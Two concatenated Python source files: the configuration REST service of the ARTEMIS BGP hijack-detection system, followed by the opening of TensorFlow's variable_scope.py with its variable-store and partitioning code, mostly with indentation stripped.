# if monitors changes, notify monitor services
if difference_booleans["monitors"]:
for service in MONITOR_SERVICES:
if service not in services_to_notify:
services_to_notify.append(service)
# configure needed services with the new config
post_configuration_to_other_services(
shared_memory_manager_dict, services=services_to_notify
)
# if the change did not come from the file observer itself,
# we write the file
if not ("origin" in msg and msg["origin"] == "fileobserver"):
write_conf_via_tmp_file(
shared_memory_manager_dict["config_file"],
shared_memory_manager_dict["tmp_config_file"],
shared_memory_manager_dict["config_data"]["raw_config"],
yaml=False,
)
# reply back to the sender with a configuration accepted
# message.
ret_json = {"success": True, "message": "configured"}
else:
log.debug("rejected new configuration")
# reply back to the sender with a configuration rejected and
# reason message.
ret_json = {"success": False, "message": _error}
except Exception:
log.exception("exception")
ret_json = {"success": False, "message": "unknown error"}
finally:
shared_memory_locks["config_data"].release()
return ret_json
class ConfigHandler(RequestHandler):
"""
REST request handler for configuration
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the configuration (in the form of a JSON dict) to the requester.
Format:
{
"prefixes": <dict>,
"asns": <dict>,
"monitors": <dict>,
"rules": <list>,
"autoignore": <dict>,
"timestamp": <timestamp>
}
"""
self.write(self.shared_memory_manager_dict["config_data"])
def post(self):
"""
Parses and checks if new configuration is correct.
Replies back to the sender if the configuration is accepted
or rejected and notifies all services if new
configuration is used.
https://github.com/FORTH-ICS-INSPIRE/artemis/blob/master/backend/configs/config.yaml
sample request body:
{
"type": <yaml|json>,
"content": <list|dict>,
"origin": <str> (optional)
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
self.write(configure_configuration(msg, self.shared_memory_manager_dict))
except Exception:
self.write(
{"success": False, "message": "error during service configuration"}
)
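# Minimal client-side sketch (hypothetical host and config path; reuses the
# module's json, requests and REST_PORT): posting a new YAML configuration to
# the ConfigHandler above.
def _example_post_config(config_path="/etc/artemis/config.yaml"):
    with open(config_path) as f:
        raw_lines = f.readlines()  # content is passed as a list of YAML lines
    r = requests.post(
        url="http://localhost:{}/config".format(REST_PORT),
        data=json.dumps({"type": "yaml", "content": raw_lines}),
    )
    return r.json()  # {"success": True|False, "message": <message>}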
class HealthHandler(RequestHandler):
"""
REST request handler for health checks.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Extract the status of a service via a GET request.
:return: {"status" : <unconfigured|running|stopped>}
"""
status = "stopped"
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
status = "running"
shared_memory_locks["data_worker"].release()
self.write({"status": status})
class ControlHandler(RequestHandler):
"""
REST request handler for control commands.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def start_data_worker(self):
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
log.info("data worker already running")
shared_memory_locks["data_worker"].release()
return "already running"
shared_memory_locks["data_worker"].release()
mp.Process(target=self.run_data_worker_process).start()
return "instructed to start"
def run_data_worker_process(self):
try:
with Connection(RABBITMQ_URI) as connection:
shared_memory_locks["data_worker"].acquire()
data_worker = ConfigurationDataWorker(
connection, self.shared_memory_manager_dict
)
self.shared_memory_manager_dict["data_worker_running"] = True
shared_memory_locks["data_worker"].release()
log.info("data worker started")
data_worker.run()
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].acquire()
self.shared_memory_manager_dict["data_worker_running"] = False
shared_memory_locks["data_worker"].release()
log.info("data worker stopped")
@staticmethod
def stop_data_worker():
shared_memory_locks["data_worker"].acquire()
try:
with Connection(RABBITMQ_URI) as connection:
with Producer(connection) as producer:
command_exchange = create_exchange("command", connection)
producer.publish(
"",
exchange=command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
serializer="ujson",
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].release()
message = "instructed to stop"
return message
def post(self):
"""
Instruct a service to start or stop by posting a command.
Sample request body:
{
"command": <start|stop>
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
command = msg["command"]
# start/stop data_worker
if command == "start":
message = self.start_data_worker()
self.write({"success": True, "message": message})
elif command == "stop":
message = self.stop_data_worker()
self.write({"success": True, "message": message})
else:
self.write({"success": False, "message": "unknown command"})
except Exception:
log.exception("Exception")
self.write({"success": False, "message": "error during control"})
class Configuration:
"""
Configuration REST Service.
"""
def __init__(self):
# initialize shared memory
shared_memory_manager = mp.Manager()
self.shared_memory_manager_dict = shared_memory_manager.dict()
self.shared_memory_manager_dict["data_worker_running"] = False
self.shared_memory_manager_dict["config_file"] = "/etc/artemis/config.yaml"
self.shared_memory_manager_dict[
"tmp_config_file"
] = "/etc/artemis/config.yaml.tmp"
self.shared_memory_manager_dict["config_data"] = {}
self.shared_memory_manager_dict["ignore_fileobserver"] = False
self.shared_memory_manager_dict["section_hashes"] = {
"prefixes": None,
"asns": None,
"monitors": None,
"rules": None,
"autoignore": None,
}
log.info("service initiated")
def make_rest_app(self):
return Application(
[
(
"/config",
ConfigHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/control",
ControlHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/health",
HealthHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/loadAsSets",
LoadAsSetsHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/hijackLearnRule",
HijackLearnRuleHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
]
)
def start_rest_app(self):
app = self.make_rest_app()
app.listen(REST_PORT)
log.info("REST worker started and listening to port {}".format(REST_PORT))
IOLoop.current().start()
class ConfigurationDataWorker(ConsumerProducerMixin):
"""
RabbitMQ Consumer/Producer for the Configuration Service.
"""
def __init__(
self, connection: Connection, shared_memory_manager_dict: Dict
) -> None:
self.connection = connection
self.shared_memory_manager_dict = shared_memory_manager_dict
self.redis = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(self.redis)
# EXCHANGES
self.autoconf_exchange = create_exchange("autoconf", connection, declare=True)
self.command_exchange = create_exchange("command", connection, declare=True)
# QUEUES
self.autoconf_filtered_update_queue = create_queue(
SERVICE_NAME,
exchange=self.autoconf_exchange,
routing_key="filtered-update",
priority=4,
random=True,
)
self.stop_queue = create_queue(
"{}-{}".format(SERVICE_NAME, uuid()),
exchange=self.command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
priority=1,
)
log.info("data worker initiated")
def get_consumers(self, Consumer: Consumer, channel: Connection) -> List[Consumer]:
return [
Consumer(
queues=[self.autoconf_filtered_update_queue],
on_message=self.handle_filtered_autoconf_updates,
prefetch_count=1,
accept=["ujson"],
),
Consumer(
queues=[self.stop_queue],
on_message=self.stop_consumer_loop,
prefetch_count=100,
accept=["ujson"],
),
]
def handle_filtered_autoconf_updates(self, message):
"""
Receives a "autoconf-update" message batch (filtered by the prefixtree),
translates the corresponding BGP updates into ARTEMIS configuration
and rewrites the configuration
:param message:
:return:
"""
if not message.acknowledged:
message.ack()
try:
bgp_updates = message.payload
if not isinstance(bgp_updates, list):
bgp_updates = [bgp_updates]
# load initial YAML configuration
(conf_key, yaml_conf) = read_conf(
load_yaml=True,
config_file=self.shared_memory_manager_dict["config_file"],
)
# process the autoconf updates
conf_needs_update = False
updates_processed = set()
for bgp_update in bgp_updates:
# if you have seen the exact same update before, skip it and keep processing the rest of the batch
if self.redis.get(bgp_update["key"]):
continue
if self.redis.exists(
"autoconf-update-keys-to-process"
) and not self.redis.sismember(
"autoconf-update-keys-to-process", bgp_update["key"]
):
continue
learn_neighbors = False
if "learn_neighbors" in bgp_update and bgp_update["learn_neighbors"]:
learn_neighbors = True
# translate the BGP update information into ARTEMIS conf primitives
(rule_prefix, rule_asns, rules) = translate_bgp_update_to_dicts(
bgp_update, learn_neighbors=learn_neighbors
)
# check if withdrawal (which may mean prefix/rule removal)
withdrawal = False
if bgp_update["type"] == "W":
withdrawal = True
# create the actual ARTEMIS configuration (use copy in case the conf creation fails)
msg, ok = translate_learn_rule_dicts_to_yaml_conf(
yaml_conf, rule_prefix, rule_asns, rules, withdrawal=withdrawal
)
if ok:
# update running configuration
conf_needs_update = True
updates_processed.add(bgp_update["key"])
else:
log.error("!!!PROBLEM with rule autoconf installation !!!!!")
log.error(msg)
log.error(bgp_update)
# remove erroneous update from circulation
if self.redis.exists("autoconf-update-keys-to-process"):
redis_pipeline = self.redis.pipeline()
redis_pipeline.srem(
"autoconf-update-keys-to-process", bgp_update["key"]
)
redis_pipeline.execute()
# cancel operations
break
# update configuration
if conf_needs_update:
configure_configuration(
{
"type": "yaml",
"content": ruamel.yaml.dump(
yaml_conf, Dumper=ruamel.yaml.RoundTripDumper
),
},
self.shared_memory_manager_dict,
)
# acknowledge the processing of autoconf BGP updates using redis
if len(updates_processed) > 0 and self.redis.exists(
"autoconf-update-keys-to-process"
):
redis_pipeline = self.redis.pipeline()
for bgp_update_key in updates_processed:
redis_pipeline.srem(
"autoconf-update-keys-to-process", bgp_update_key
)
redis_pipeline.execute()
except Exception:
log.exception("exception")
def stop_consumer_loop(self, message: Dict) -> None:
"""
Callback function that stops the current consumer loop
"""
message.ack()
self.should_stop = True
def main():
# initiate configuration service with REST
configurationService = Configuration()
# reads and parses initial configuration file
shared_memory_locks["config_data"].acquire()
try:
(conf_key, raw) = read_conf(
load_yaml=False,
config_file=configurationService.shared_memory_manager_dict["config_file"],
)
configurationService.shared_memory_manager_dict[
"config_data"
], _flag, _error = parse(raw, yaml=True)
# update data hashes
configurationService.shared_memory_manager_dict["section_hashes"] = {
"prefixes": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"prefixes"
]
),
"asns": get_hash(
configurationService.shared_memory_manager_dict["config_data"]["asns"]
),
"monitors": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"monitors"
]
),
"rules": get_hash(
configurationService.shared_memory_manager_dict["config_data"]["rules"]
),
"autoignore": get_hash(
configurationService.shared_memory_manager_dict["config_data"][
"autoignore"
]
),
}
# configure all other services (independent of hash changes, since it is startup) with the current config
post_configuration_to_other_services(
configurationService.shared_memory_manager_dict
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["config_data"].release()
# start REST within main process
configurationService.start_rest_app()
if __name__ == "__main__":
main()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
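# Illustrative sketch (not part of the public API): how _PartitionInfo reports
# the slice dimension and offset for a variable of full shape [10, 10] that is
# split along dimension 1, for the shard starting at offset 5.
def _example_partition_info():
    info = _PartitionInfo(full_shape=[10, 10], var_offset=[0, 5])
    assert info.single_slice_dim([10, 5]) == 1  # partitioned along dim 1
    assert info.single_offset([10, 5]) == 5  # this shard's offset in that dim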
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
  return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize. If `synchronization` is set to `ON_READ`, `trainable` must
not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
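For example, a minimal sketch using the standard fixed-shard partitioner
from `tf.compat.v1` (the scope and variable names here are illustrative only):
```python
# Split a [10, 256] variable into 4 shards along axis 0.
partitioner = tf.compat.v1.fixed_size_partitioner(num_shards=4, axis=0)
with tf.compat.v1.variable_scope("emb", partitioner=partitioner):
  v = tf.compat.v1.get_variable("weights", shape=[10, 256])
# v is a PartitionedVariable; its shards are emb/weights/part_0..part_3.
```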
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize. If `synchronization` is set to `ON_READ`, `trainable` must
not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
